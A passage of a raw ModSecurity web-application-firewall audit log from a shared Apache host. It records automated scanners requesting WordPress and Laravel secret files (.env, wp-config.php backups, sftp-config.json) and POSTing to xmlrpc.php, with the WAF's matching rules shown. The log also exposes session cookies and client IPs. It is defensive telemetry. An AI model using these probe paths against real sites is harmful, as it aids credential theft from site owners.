text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --57ff9412-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --57ff9412-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/system/.env"] [unique_id "aE6xeRRnvL96XFagPFC5lQAAAAY"] Stopwatch: 1749987705351543 2822 (- - -) Stopwatch2: 1749987705351543 2822; combined=1698, p1=365, p2=1240, p3=24, p4=23, p5=46, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --57ff9412-Z-- --fae91e5f-A-- [15/Jun/2025:17:11:45.485105 +0530] aE6xeQ2U8ofTdsKp_yhLngAAAAU 91.232.140.197 34554 127.0.0.1 7080 --fae91e5f-B-- GET /wp-config.php~ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --fae91e5f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --fae91e5f-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.php~"] [unique_id "aE6xeQ2U8ofTdsKp_yhLngAAAAU"] Stopwatch: 1749987705481968 3205 (- - -) Stopwatch2: 1749987705481968 3205; combined=1988, p1=373, p2=1503, p3=29, p4=23, p5=59, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fae91e5f-Z-- --cefb1e2e-A-- [15/Jun/2025:17:11:45.615654 +0530] aE6xeXrzia-Xuz8LZxRK0QAAAAg 91.232.140.197 34568 127.0.0.1 7080 --cefb1e2e-B-- GET /wp-config.inc HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --cefb1e2e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --cefb1e2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wp-config.inc"] [unique_id "aE6xeXrzia-Xuz8LZxRK0QAAAAg"] Stopwatch: 1749987705612822 2881 (- - -) Stopwatch2: 1749987705612822 2881; combined=1758, p1=326, p2=1324, p3=31, p4=22, p5=55, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cefb1e2e-Z-- --04732837-A-- [15/Jun/2025:17:11:45.746376 +0530] aE6xeVu1-lKBbvo2E9pCWwAAAAw 91.232.140.197 34584 127.0.0.1 7080 --04732837-B-- GET /wp-config.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --04732837-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --04732837-H-- Message: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.old"] [unique_id "aE6xeVu1-lKBbvo2E9pCWwAAAAw"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wp-config.old"] [unique_id "aE6xeVu1-lKBbvo2E9pCWwAAAAw"] Stopwatch: 1749987705743364 3091 (- - -) Stopwatch2: 1749987705743364 3091; combined=1861, p1=359, p2=1327, p3=40, p4=31, p5=104, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --04732837-Z-- --acd1464a-A-- [15/Jun/2025:17:11:45.876939 +0530] aE6xeVCip1xXG9qkRMduSwAAAAc 91.232.140.197 34588 127.0.0.1 7080 --acd1464a-B-- GET /wp-config.php.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --acd1464a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --acd1464a-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.php.bak"] [unique_id "aE6xeVCip1xXG9qkRMduSwAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wp-config.php.bak"] [unique_id "aE6xeVCip1xXG9qkRMduSwAAAAc"] Stopwatch: 1749987705873865 3126 (- - -) Stopwatch2: 1749987705873865 3126; combined=1989, p1=331, p2=1526, p3=27, p4=21, p5=84, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --acd1464a-Z-- --1c336932-A-- [15/Jun/2025:17:11:46.007728 +0530] aE6xelirsA1ruSKrNWSVxQAAAAQ 91.232.140.197 34590 127.0.0.1 7080 --1c336932-B-- GET /wp-config.php.dist HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --1c336932-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c336932-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.php.dist"] [unique_id "aE6xelirsA1ruSKrNWSVxQAAAAQ"] Stopwatch: 1749987706004750 3030 (- - -) Stopwatch2: 1749987706004750 3030; combined=1846, p1=389, p2=1324, p3=28, p4=22, p5=83, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1c336932-Z-- --c87d275c-A-- [15/Jun/2025:17:11:46.139082 +0530] aE6xehRnvL96XFagPFC5lgAAAAY 91.232.140.197 34598 127.0.0.1 7080 --c87d275c-B-- GET /wp-config.php.inc HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --c87d275c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c87d275c-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.php.inc"] [unique_id "aE6xehRnvL96XFagPFC5lgAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wp-config.php.inc"] [unique_id "aE6xehRnvL96XFagPFC5lgAAAAY"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/default/htdocs/wp-config.php.inc' not found or unable to stat Stopwatch: 1749987706135309 3846 (- - -) Stopwatch2: 1749987706135309 3846; combined=2509, p1=451, p2=1883, p3=37, p4=28, p5=110, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c87d275c-Z-- --4a131d0f-A-- [15/Jun/2025:17:11:46.269881 +0530] aE6xeg2U8ofTdsKp_yhLnwAAAAU 91.232.140.197 34608 127.0.0.1 7080 --4a131d0f-B-- GET /wp-config.php.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --4a131d0f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a131d0f-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.php.old"] [unique_id "aE6xeg2U8ofTdsKp_yhLnwAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wp-config.php.old"] [unique_id "aE6xeg2U8ofTdsKp_yhLnwAAAAU"] Stopwatch: 1749987706266783 3149 (- - -) Stopwatch2: 1749987706266783 3149; combined=1882, p1=407, p2=1342, p3=27, p4=21, p5=85, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4a131d0f-Z-- --de03cc66-A-- [15/Jun/2025:17:11:46.399890 +0530] aE6xelu1-lKBbvo2E9pCXAAAAAw 91.232.140.197 34624 127.0.0.1 7080 --de03cc66-B-- GET /wp-config.php.txt HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --de03cc66-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --de03cc66-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.php.txt"] [unique_id "aE6xelu1-lKBbvo2E9pCXAAAAAw"] Stopwatch: 1749987706397269 2671 (- - -) Stopwatch2: 1749987706397269 2671; combined=1663, p1=368, p2=1202, p3=24, p4=19, p5=50, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --de03cc66-Z-- --82fc3a66-A-- [15/Jun/2025:17:11:46.530900 +0530] aE6xelCip1xXG9qkRMduTAAAAAc 91.232.140.197 34634 127.0.0.1 7080 --82fc3a66-B-- GET /wp-config.txt HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --82fc3a66-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --82fc3a66-H-- Message: Warning. Matched phrase "wp-config.txt" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.txt" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.txt"] [unique_id "aE6xelCip1xXG9qkRMduTAAAAAc"] Stopwatch: 1749987706527371 3599 (- - -) Stopwatch2: 1749987706527371 3599; combined=2249, p1=515, p2=1600, p3=28, p4=25, p5=81, sr=168, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82fc3a66-Z-- --f3dc5234-A-- [15/Jun/2025:17:12:16.520258 +0530] aE6xlxRnvL96XFagPFC5ogAAAAY 185.177.72.144 36052 127.0.0.1 7081 --f3dc5234-B-- GET /laravel/.env HTTP/1.0 Host: www.best-website-designs.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f3dc5234-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://best-website-designs.com/laravel/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --f3dc5234-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.best-website-designs.com"] [uri "/laravel/.env"] [unique_id "aE6xlxRnvL96XFagPFC5ogAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987735551790 968534 (- - -) Stopwatch2: 1749987735551790 968534; combined=1883, p1=376, p2=1420, p3=0, p4=0, p5=87, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f3dc5234-Z-- --b710d870-A-- [15/Jun/2025:17:12:16.934572 +0530] aE6xl197WYuiWZZK24X5bAAAAAI 165.22.247.248 36064 127.0.0.1 7081 --b710d870-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=vft85ogihgnclleo3j36h0e5kk; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_db77f4332f21f9118a741881b111a7%7C%7C1750160535%7C%7C1750156935%7C%7C64184119ad47fd68338b1ded53b72097; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=40116856a72ba55eda3d1a5e15572b6f%7C%7C1750160535%7C%7C1750156935%7C%7Cb2a380d8d5c19df46d9ae58716f7a30f User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --b710d870-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=3lvlih8345962phl5a6va29roc; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_aa03ce202cbb1e9314b54e0fc3d96b%7C%7C1750160536%7C%7C1750156936%7C%7C06d351a0b99f4ea791571d51969bf029; expires=Tue, 17 Jun 2025 11:42:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=581f181e87c0798fc9c913e262e2a3db%7C%7C1750160536%7C%7C1750156936%7C%7C7e0ef5e8d59bbf23f62209fdc20c7e8f; expires=Tue, 17 Jun 2025 11:42:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b710d870-E-- --b710d870-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6xl197WYuiWZZK24X5bAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987735903552 1031103 (- - -) Stopwatch2: 1749987735903552 1031103; combined=3189, p1=380, p2=2314, p3=109, p4=43, p5=208, sr=96, sw=135, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b710d870-Z-- --0a1c026e-A-- [15/Jun/2025:17:12:58.389646 +0530] aE6xwUca6QMKkQvLlAAqogAAAAk 35.181.43.144 45350 127.0.0.1 7081 --0a1c026e-B-- GET /sftp-config.json HTTP/1.0 Host: www.bspsons.com X-Real-IP: 35.181.43.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --0a1c026e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --0a1c026e-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/sftp-config.json"] [unique_id "aE6xwUca6QMKkQvLlAAqogAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987777820652 569058 (- - -) Stopwatch2: 1749987777820652 569058; combined=1658, p1=361, p2=1207, p3=0, p4=0, p5=90, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0a1c026e-Z-- --3f69585a-A-- [15/Jun/2025:17:13:16.200842 +0530] aE6x00ca6QMKkQvLlAAqqgAAAAk 165.22.247.248 55732 127.0.0.1 7081 --3f69585a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=fltqa12fvkctr4cj2e5kkd27jb; 